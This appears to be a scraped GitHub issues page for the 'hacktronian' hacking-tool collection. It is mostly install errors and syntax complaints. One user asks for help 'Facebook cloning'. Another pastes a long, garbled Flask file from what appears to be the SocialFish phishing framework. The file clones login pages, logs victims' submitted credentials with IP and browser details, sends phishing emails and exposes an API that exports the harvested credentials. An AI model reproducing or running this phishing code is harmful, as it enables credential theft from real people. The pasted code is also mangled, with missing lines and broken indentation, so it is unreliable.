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hacktronian's Issues


โ””โ”€โ”€โ•ผ $sudo hacktronian
File "/usr/share/doc/hacktronian/", line 82
print """
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(""")?

This happens if i run just hacktronian or sudo hacktronian on Parrot sec


Thaks you for traning

Hurts my eyes

As a developer who developes websites, cyber weapons, and even AI this code hurt my eyes, i think it can be done way WAY better for one



then again uptop and through the entire script i see

multiple times with no end even though you have an entire function for clearing the screen already, this annoys me the most about developers i hate looking at code and seeing os.system and time.sleep statements over and over and over and over through the entire script

no need for that much system clear statements in one brick of code


Please share a file

Not working on Kali Linux (Running on a RPI 2W) "SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?"

[!] This Tool Must Run As ROOT [!]

[>] Press ENTER to Install Hacktronian, CTRL+C to Abort.

[โœ”] Checking directories...
[!] A Directory hacktronian Was Found.. Do You Want To Replace It ? [y/n]:
[โœ”] Installing ...

Cloning into '/usr/share/doc/hacktronian'...
remote: Enumerating objects: 190, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 190 (delta 4), reused 10 (delta 0), pack-reused 175
Receiving objects: 100% (190/190), 199.08 KiB | 227.00 KiB/s, done.
Resolving deltas: 100% (103/103), done.

[โœ”] Successfuly Installed !!! [โœ”]

[โœ”] โœ”โœ”โœ” All Is Done!! you can execute tool by typing hacktronian !! โœ”โœ”โœ” [โœ”]

โ””โ”€# hacktronian
File "/usr/share/doc/hacktronian/", line 82
print """
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?


Hello sir
I need your help how can I create a termux command for Facebook cloning


#!/usr/bin/env python3

from flask import Flask, request, render_template, jsonify, redirect, g, flash
from core.config import *
from core.view import head
from core.scansf import nScan
from core.clonesf import clone
from core.dbsf import initDB
from core.genToken import genToken, genQRCode
from core.sendMail import sendMail
from core.tracegeoIp import tracegeoIp
from core.cleanFake import cleanFake
from core.genReport import genReport
from import generate_unique #>> new line
from datetime import date
from sys import argv, exit, version_info
import colorama
import sqlite3
import flask_login
import os

Verificar argumentos

if len(argv) < 2:
print("./SocialFish \n\ni.e.: ./ root pass")


users = {argv[1]: {'password': argv[2]}}

Definicoes do flask

app = Flask(name, static_url_path='',
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0

Inicia uma conexao com o banco antes de cada requisicao

def before_request():
g.db = sqlite3.connect(DATABASE)

Finaliza a conexao com o banco apos cada conexao

def teardown_request(exception):
if hasattr(g, 'db'):

Conta o numero de credenciais salvas no banco

def countCreds():
count = 0
cur = g.db
select_all_creds = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc")
for i in select_all_creds:
count += 1
return count

Conta o numero de visitantes que nao foram pegos no phishing

def countNotPickedUp():
count = 0

cur = g.db
select_clicks = cur.execute("SELECT clicks FROM socialfish where id = 1")

for i in select_clicks:
    count = i[0]

count = count - countCreds()
return count


definicoes do flask e de login

app.secret_key = APP_SECRET_KEY
login_manager = flask_login.LoginManager()

class User(flask_login.UserMixin):

def user_loader(email):
if email not in users:

user = User() = email
return user

def request_loader(request):
email = request.form.get('email')
if email not in users:

user = User() = email
user.is_authenticated = request.form['password'] == users[email]['password']

return user


Rota para o caminho de inicializacao, onde e possivel fazer login

@app.route('/neptune', methods=['GET', 'POST'])
def admin():
# se a requisicao for get
if request.method == 'GET':
# se o usuario estiver logado retorna para a pagina de credenciais
if flask_login.current_user.is_authenticated:
return redirect('/creds')
# caso contrario retorna para a pagina de login
return render_template('signin.html')

# se a requisicao for post, verifica-se as credencias
if request.method == 'POST':
    email = request.form['email']
        # caso sejam corretas
        if request.form['password'] == users[email]['password']:
            user = User()
   = email
            # torna autentico
            # retorna acesso a pagina restrita
            return redirect('/creds')
        # contrario retorna erro
            # temporario
            return "bad"
        return "bad"

funcao onde e realizada a renderizacao da pagina para a vitima

def getLogin():
# caso esteja configurada para clonar, faz o download da pagina utilizando o user-agent do visitante
if sta == 'clone':
agent = request.headers.get('User-Agent').encode('ascii', 'ignore').decode('ascii')
clone(url, agent, beef)
o = url.replace('://', '-')
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 where id = 1")
template_path = 'fake/{}/{}/index.html'.format(agent, o)
return render_template(template_path)
# caso seja a url padrao
elif url == '':
return render_template('default.html')
# caso seja configurada para custom
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 where id = 1")
return render_template('custom.html')

funcao onde e realizado o login por cada pagina falsa

@app.route('/login', methods=['POST'])
def postData():
if request.method == "POST":
fields = [k for k in request.form]
values = [request.form[k] for k in request.form]
data = dict(zip(fields, values))
browser = str(request.user_agent.browser)
bversion = str(request.user_agent.version)
platform = str(request.user_agent.platform)
rip = str(request.remote_addr)
d = "{:%m-%d-%Y}".format(
cur = g.db
sql = "INSERT INTO creds(url,jdoc,pdate,browser,bversion,platform,rip) VALUES(?,?,?,?,?,?,?)"
creds = (url, str(data), d, browser, bversion, platform, rip)
cur.execute(sql, creds)
return redirect(red)

funcao para configuracao do funcionamento CLONE ou CUSTOM, com BEEF ou NAO

@app.route('/configure', methods=['POST'])
def echo():
global url, red, sta, beef
red = request.form['red']
sta = request.form['status']
beef = request.form['beef']

if sta == 'clone':
    url = request.form['url']
    url = 'Custom'

if len(url) > 4 and len(red) > 4:
    if 'http://' not in url and sta != '1' and 'https://' not in url:
        url = 'http://' + url
    if 'http://' not in red and 'https://' not in red:
        red = 'http://' + red
    url = ''
    red = ''
cur = g.db
cur.execute("UPDATE socialfish SET attacks = attacks + 1 where id = 1")
return redirect('/creds')

pagina principal do dashboard

def getCreds():
cur = g.db
attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
data = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc").fetchall()
return render_template('admin/index.html', data=data, clicks=clicks, countCreds=countCreds, countNotPickedUp=countNotPickedUp, attacks=attacks, tokenapi=tokenapi)

pagina para envio de emails

@app.route("/mail", methods=['GET', 'POST'])
def getMail():
if request.method == 'GET':
cur = g.db
email = cur.execute("SELECT email FROM sfmail where id = 1").fetchone()[0]
smtp = cur.execute("SELECT smtp FROM sfmail where id = 1").fetchone()[0]
port = cur.execute("SELECT port FROM sfmail where id = 1").fetchone()[0]
return render_template('admin/mail.html', email=email, smtp=smtp, port=port)
if request.method == 'POST':
subject = request.form['subject']
email = request.form['email']
password = request.form['password']
recipient = request.form['recipient']
body = request.form['body']
smtp = request.form['smtp']
port = request.form['port']
sendMail(subject, email, password, recipient, body, smtp, port)
cur = g.db
cur.execute("UPDATE sfmail SET email = '{}' where id = 1".format(email))
cur.execute("UPDATE sfmail SET smtp = '{}' where id = 1".format(smtp))
cur.execute("UPDATE sfmail SET port = '{}' where id = 1".format(port))
return redirect('/mail')

Rota para consulta de log

@app.route("/single/", methods=['GET'])
def getSingleCred(id):
sql = "SELECT jdoc FROM creds where id = {}".format(id)
cur = g.db
credInfo = cur.execute(sql).fetchall()
if len(credInfo) > 0:
return render_template('admin/singlecred.html', credInfo=credInfo)
return "Not found"
return "Bad parameter"

rota para rastreio de ip

@app.route("/trace/", methods=['GET'])
def getTraceIp(ip):
traceIp = tracegeoIp(ip)
return render_template('admin/traceIp.html', traceIp=traceIp, ip=ip)
return "Network Error"

rota para scan do nmap

@app.route("/scansf/", methods=['GET'])
def getScanSf(ip):
return render_template('admin/scansf.html', nScan=nScan, ip=ip)

rota post para revogar o token da api

@app.route("/revokeToken", methods=['POST'])
def revokeToken():
revoke = request.form['revoke']
if revoke == 'yes':
cur = g.db
upsql = "UPDATE socialfish SET token = '{}' where id = 1".format(genToken())
token = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
genQRCode(token, revoked=True)
return redirect('/creds')

pagina para gerar relatorios

@app.route("/report", methods=['GET', 'POST'])
def getReport():
if request.method == 'GET':
cur = g.db
urls = cur.execute("SELECT DISTINCT url FROM creds").fetchall()
users = cur.execute("SELECT name FROM professionals").fetchall()
companies = cur.execute("SELECT name FROM companies").fetchall()
uniqueUrls = []
for u in urls:
if u not in uniqueUrls:
return render_template('admin/report.html', uniqueUrls=uniqueUrls, users=users, companies=companies)
if request.method == 'POST':
subject = request.form['subject']
user = request.form['selectUser']
company = request.form['selectCompany']
date_range = request.form['datefilter']
target = request.form['selectTarget']
_target = 'All' if target=='0' else target
genReport(DATABASE, subject, user, company, date_range, _target)
return redirect('/report')

pagina para cadastro de profissionais

@app.route("/professionals", methods=['GET', 'POST'])
def getProfessionals():
if request.method == 'GET':
return render_template('admin/professionals.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
obs = request.form['obs']
sql = "INSERT INTO professionals(name,email,obs) VALUES(?,?,?)"
info = (name, email, obs)
cur = g.db
cur.execute(sql, info)
return redirect('/professionals')

pagina para cadastro de empresas

@app.route("/companies", methods=['GET', 'POST'])
def getCompanies():
if request.method == 'GET':
return render_template('admin/companies.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
phone = request.form['phone']
address = request.form['address']
site = request.form['site']
sql = "INSERT INTO companies(name,email,phone,address,site) VALUES(?,?,?,?,?)"
info = (name, email, phone, address, site)
cur = g.db
cur.execute(sql, info)
return redirect('/companies')

rota para gerenciamento de usuarios

@app.route("/sfusers/", methods=['GET'])
def getSfUsers():
return render_template('admin/sfusers.html')


def logout():
return 'Logged out'

def unauthorized_handler():
return 'Unauthorized'




@app.route("/api/checkKey/", methods=['GET'])
def checkKey(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
status = {'status':'ok'}
status = {'status':'bad'}
return jsonify(status)

@app.route("/api/statistics/", methods=['GET'])
def getStatics(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
cur = g.db
attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
countC = countCreds()
countNPU = countNotPickedUp()
info = {'status':'ok','attacks':attacks, 'clicks':clicks, 'countCreds':countC, 'countNotPickedUp':countNPU}
info = {'status':'bad'}
return jsonify(info)

@app.route("/api/getJson/", methods=['GET'])
def getJson(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
sql = "SELECT * FROM creds"
cur = g.db
credInfo = cur.execute(sql).fetchall()
listCreds = []
if len(credInfo) > 0:
for c in credInfo:
cred = {'id':c[0],'url':c[1], 'post':c[2], 'date':c[3], 'browser':c[4], 'version':c[5],'os':c[6],'ip':c[7]}
credInfo = {'status':'nothing'}
return jsonify(listCreds)
return "Bad parameter"
credInfo = {'status':'bad'}
return jsonify(credInfo)

@app.route('/api/configure', methods = ['POST'])
def postConfigureApi():
global url, red, sta, beef
if request.is_json:
content = request.get_json()
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if content['key'] == tokenapi:
red = content['red']
beef = content['beef']
if content['sta'] == 'clone':
sta = 'clone'
url = content['url']
sta = 'custom'
url = 'Custom'

        if url != 'Custom':
            if len(url) > 4:
                if 'http://' not in url and sta != '1' and 'https://' not in url:
                    url = 'http://' + url
        if len(red) > 4:
            if 'http://' not in red and 'https://' not in red:
                red = 'http://' + red
            red = ''
        cur = g.db
        cur.execute("UPDATE socialfish SET attacks = attacks + 1 where id = 1")
        status = {'status':'ok'}
        status = {'status':'bad'}
    status = {'status':'bad'}
return jsonify(status)

@app.route("/api/mail", methods=['POST'])
def postSendMail():
if request.is_json:
content = request.get_json()
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if content['key'] == tokenapi:
subject = content['subject']
email = content['email']
password = content['password']
recipient = content['recipient']
body = content['body']
smtp = content['smtp']
port = content['port']
if sendMail(subject, email, password, recipient, body, smtp, port) == 'ok':
cur = g.db
cur.execute("UPDATE sfmail SET email = '{}' where id = 1".format(email))
cur.execute("UPDATE sfmail SET smtp = '{}' where id = 1".format(smtp))
cur.execute("UPDATE sfmail SET port = '{}' where id = 1".format(port))
status = {'status':'ok'}
status = {'status':'bad','error':str(sendMail(subject, email, password, recipient, body, smtp, port))}
status = {'status':'bad'}
status = {'status':'bad'}
return jsonify(status)

@app.route("/api/trace//", methods=['GET'])
def getTraceIpMob(key, ip):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
traceIp = tracegeoIp(ip)
return jsonify(traceIp)
content = {'status':'bad'}
return jsonify(content)
content = {'status':'bad'}
return jsonify(content)

@app.route("/api/scansf//", methods=['GET'])
def getScanSfMob(key, ip):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
return jsonify(nScan(ip))
content = {'status':'bad'}
return jsonify(content)

@app.route("/api/infoReport/", methods=['GET'])
def getReportMob(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
urls = cur.execute("SELECT url FROM creds").fetchall()
users = cur.execute("SELECT name FROM professionals").fetchall()
comp = cur.execute("SELECT name FROM companies").fetchall()
uniqueUrls = []
professionals = []
companies = []
for c in comp:
for p in users:
for u in urls:
if u not in uniqueUrls:
info = {'urls':uniqueUrls,'professionals':professionals, 'companies':companies}
return jsonify(info)
return jsonify({'status':'bad'})

def main():
if version_info<(3,0,0):
print('[!] Please use Python 3. $ python3')
# Inicia o banco
initDB(DATABASE)"", port=5000)

if name == "main":
except KeyboardInterrupt:

Permisson denied error even in root mode

I'm root user in termux but I can't execute with this error:
127|on5xelte:/data/data/com.termux/files/home/hacktronian/Fluxion # ./ /system/bin/sh: ./ can't execute: Permission denied


a number oof error in your tool . i try to to use it in termux . i fix them. please update tool for other.

SyntaxError: invalid syntax

Hello there,

I have installed the script on my Manjaro Linux and when trying to run it using this command

i got the following error



Bro, since you have attached MIT license with it. I'm using your code on behalf of me on Github

i'm just asking - can i use it?

Not working.

(Debian Wheezy (iphoneos-arm))
I did python2
Then I saw this:
_File "", line 12, in ย 
import argparse ย 
File "/usr/lib/python2.7/", line 85, in ย 
import collections as _collections ย 
File "/usr/lib/python2.7/", line 20, in ย 
from collections import deque, defaultdict ย 
ImportError: dynamic module does not define init function (init_collections)

Eh, idk

SyntaxError: invalid syntax

Hello there,

I have installed the script on my termux and when trying to run it using this command
cd hacktronian && python

i got the following error

File "", line 90
SyntaxError: invalid syntax


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